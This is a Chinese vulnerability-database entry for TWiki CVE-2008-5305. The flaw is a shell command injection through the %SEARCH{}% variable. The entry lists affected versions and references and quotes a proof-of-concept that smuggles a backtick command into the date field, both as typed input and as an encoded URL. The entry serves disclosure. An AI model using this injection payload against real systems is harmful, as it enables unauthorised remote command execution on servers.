TWiki SEARCH变量SHELL命令注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116958 漏洞类型 代码注入
发布时间 2008-12-06 更新时间 2008-12-08
CVE编号 CVE-2008-5305 CNNVD-ID CNNVD-200812-175
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/32645
https://www.securityfocus.com/bid/32668
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-175
|漏洞详情
TWiki是一款灵活易用、功能强大的企业协作平台和知识管理系统。由于没有正确地过滤对perleval命令所传送的输入,远程攻击者可以通过向TWiki提交恶意的%SEARCH{}%变量或GETURL导致向Perl反引号(``)运算中注入并执行SHELL命令。如果没有对TWiki执行访问限制的话,攻击者无需认证便可以使用SEARCH变量。
|漏洞EXP
source: http://www.securityfocus.com/bid/32668/info

TWiki is prone to a vulnerability that attackers can leverage to execute arbitrary commands in the context of the application. This issue occurs because the application fails to adequately sanitize user-supplied input.

Successful attacks can compromise the affected application and possibly the underlying computer. 

Enter the following in the application's search box:
%SEARCH{ date="P`pr -?`" search="xyzzy" }%

http://www.example.com/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all
|受影响的产品
TWiki TWiki 4.2.3 TWiki TWiki 4.2.2 TWiki TWiki 4.2.1 TWiki TWiki 4.2 TWiki TWiki 4.1.2 TWiki TWiki 4.1.1 TWiki TWiki 4.1 TWiki TWiki 4.
|参考资料

来源:VUPEN
名称:ADV-2008-3381
链接:http://www.vupen.com/english/advisories/2008/3381
来源:BID
名称:32668
链接:http://www.securityfocus.com/bid/32668
来源:twiki.org
链接:http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2008-5305
来源:SECTRACK
名称:1021352
链接:http://securitytracker.com/id?1021352
来源:SECUNIA
名称:33040
链接:http://secunia.com/advisories/33040